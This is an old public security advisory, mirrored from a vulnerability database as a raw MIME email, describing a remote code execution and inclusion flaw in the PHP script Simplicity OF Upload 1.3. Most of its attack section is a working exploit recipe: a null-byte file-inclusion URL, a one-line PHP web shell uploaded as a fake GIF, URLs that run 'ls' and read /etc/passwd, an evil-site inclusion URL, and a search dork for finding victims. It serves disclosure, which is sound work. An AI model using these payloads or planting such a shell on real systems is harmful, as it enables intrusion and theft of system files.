Vulners
Lucene search
simplicityRemote.txt
`
--------------Boundary-00=_B6O8YHI1VA4000000000
Content-Type: Text/Plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
26/07/2005 16.09.18=0D
=0D
Simplicity OF Upload 1.3 (possibly prior versons) remote code execution =0D
& cross site scripting=0D
=0D
software: =0D
author site: http://www.phpsimplicity.com/scripts.php?id=3D3=0D
=0D
=0D
remote commands execution:=0D
=0D
problem at line 25-30: =0D
=2E..=0D
//check for language overriding..=0D
if (isset($_GET['language']))=0D
$language =3D strtolower($_GET['language']);=0D
=0D
//now we include the language file=0D
require_once("$language.lng");=0D
=2E..=0D
=0D
you can include whatever adding a null byte to "language" parameter value=
:=0D
=0D
example:=0D
http://localhost:30/simply/download.php?language=3Dupload.php%00=0D
=0D
you will see upload & download page together :)=0D
=0D
so you can upload a cmd.gif (when you upload a .php file, usually it is=0D
renamed to .html...) file with this php code inside to execute=0D
commands:=0D
=0D
<?php=0D
=0D
system($HTTP_GET_VARS[command]);=0D
=0D
?>=0D
=0D
then try this url:=0D
=0D
http://[target]/[path]/download.php?language=3Dcmd.gif%00&command=3Dls=0D
=0D
to list directories=0D
=0D
http://[target]/[path]/download.php?language=3Dcmd
gif%00&command=3Dcat%20/etc/passwd=0D
=0D
to show /etc/passwd file=0D
=0D
cross site scripting:=0D
=0D
also, a remote user can supply a specially crafted URL to redirect other
people=0D
to an evil page:=0D
=0D
http://[target]/[path]/download
php?language=3Dhttp://[evil_site]/[evil_page]%00=0D
=0D
=0D
=0D
googledork:=0D
=0D
"Powered By: Simplicity oF Upload"=0D
=0D
=0D
rgod=0D
email: rgod[at]autistici.org=0D
site: http://rgod.altervista.org=0D
original advisory: http://rgod.altervista.org/simply.html
--------------Boundary-00=_B6O8YHI1VA4000000000
Content-Type: Text/HTML;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-=
1">
<META content=3D"IncrediMail 1.0" name=3DGENERATOR>
<!--IncrdiXMLRemarkStart>
<IncrdiX-Info>
<X-FID>FLAVOR00-NONE-0000-0000-000000000000</X-FID>
<X-FVER>4.0</X-FVER>
<X-CNT>;</X-CNT>
</IncrdiX-Info>
<IncrdiXMLRemarkEnd-->
</HEAD>
<BODY style=3D"BACKGROUND-POSITION: 0px 0px; FONT-SIZE: 12pt; MARGIN: 5px=
10px 10px; FONT-FAMILY: Arial" bgColor=3D#ffffff background=3D"" scroll=3D=
yes ORGYPOS=3D"0">
<TABLE id=3DINCREDIMAINTABLE cellSpacing=3D0 cellPadding=3D2 width=3D"100=
%" border=3D0>
<TBODY>
<TR>
<TD id=3DINCREDITEXTREGION style=3D"FONT-SIZE: 12pt; CURSOR: auto; FONT-F=
AMILY: Arial" width=3D"100%"><PRE><CODE><SPAN style=3D"FONT: 10pt Courier=
New"><SPAN class=3Dgeneral1-number>26/07/2005 16.09.18
Simplicity OF Upload 1.3 (possibly prior versons) remote code execution=20
& cross site scripting
software:=20
author site: http://www.phpsimplicity.com/scripts.php?id=3D3
remote commands execution:
problem at line 25-30:=20
=2E..
//check for language overriding..
if (isset($_GET['language']))
$language =3D strtolower($_GET['language']);
//now we include the language file
require_once("$language.lng");
=2E..
you can include whatever adding a null byte to "language" parameter value=
:
example:
http://localhost:30/simply/download.php?language=3Dupload.php%00
you will see upload & download page together :)
so you can upload a cmd.gif (when you upload a .php file, usually it is
renamed to .html...) file with this php code inside to execute
commands:
<?php
system($HTTP_GET_VARS[command]);
?>
then try this url:
http://[target]/[path]/download.php?language=3Dcmd.gif%00&command=3Dl=
s
to list directories
http://[target]/[path]/download.php?language=3Dcmd.gif%00&command=3Dc=
at%20/etc/passwd
to show /etc/passwd file
cross site scripting:
also, a remote user can supply a specially crafted URL to redirect other =
people
to an evil page:
http://[target]/[path]/download.php?language=3Dhttp://[evil_site]/[evil_p=
age]%00
googledork:
"Powered By: Simplicity oF Upload"
rgod
email: rgod[at]autistici.org
site: <A href=3D"http://rgod.altervista.orgoriginal">http://rgod.altervis=
ta.org
</SPAN></SPAN>original</A> advisory: <A href=3D"http://rgod.altervista.or=
g/simply.html">http://rgod.altervista.org/simply.html</A>
</CODE></PRE></TD></TR>
<TR>
<TD id=3DINCREDIFOOTER width=3D"100%">
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
<TBODY>
<TR>
<TD width=3D"100%"></TD>
<TD id=3DINCREDISOUND vAlign=3Dbottom align=3Dmiddle></TD>
<TD id=3DINCREDIANIM vAlign=3Dbottom align=3Dmiddle></TD></TR></TBODY></T=
ABLE></TD></TR></TBODY></TABLE><SPAN id=3DIncrediStamp><SPAN dir=3Dltr><A=
title=3D"Add FUN to your email - CLICK HERE!" style=3D"TEXT-DECORATION: =
none" href=3D"http://www.incredimail.com/index.asp?id=3D96322"><FONT styl=
e=3D"COLOR: black" face=3D"Arial, Helvetica, sans-serif" size=3D2>_______=
______________________________________________________________<BR> <=
B>FREE Emoticons for your email! </FONT><FONT face=3D"Arial, Helvetica, s=
ans-serif" size=3D2><U>Click Here!</U></B> &=
nbsp; &n=
bsp; &nb=
sp; </FONT><BR=
><IMG hspace=3D0 src=3D"http://www2.incredimail.com/contents/stamps/imstp=
_7_05_10.gif" align=3Dbaseline border=3D0></A></SPAN></SPAN></BODY></HTML=
>
--------------Boundary-00=_B6O8YHI1VA4000000000--
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jul 2005 00:00Current
7.4High risk
Vulners AI Score7.4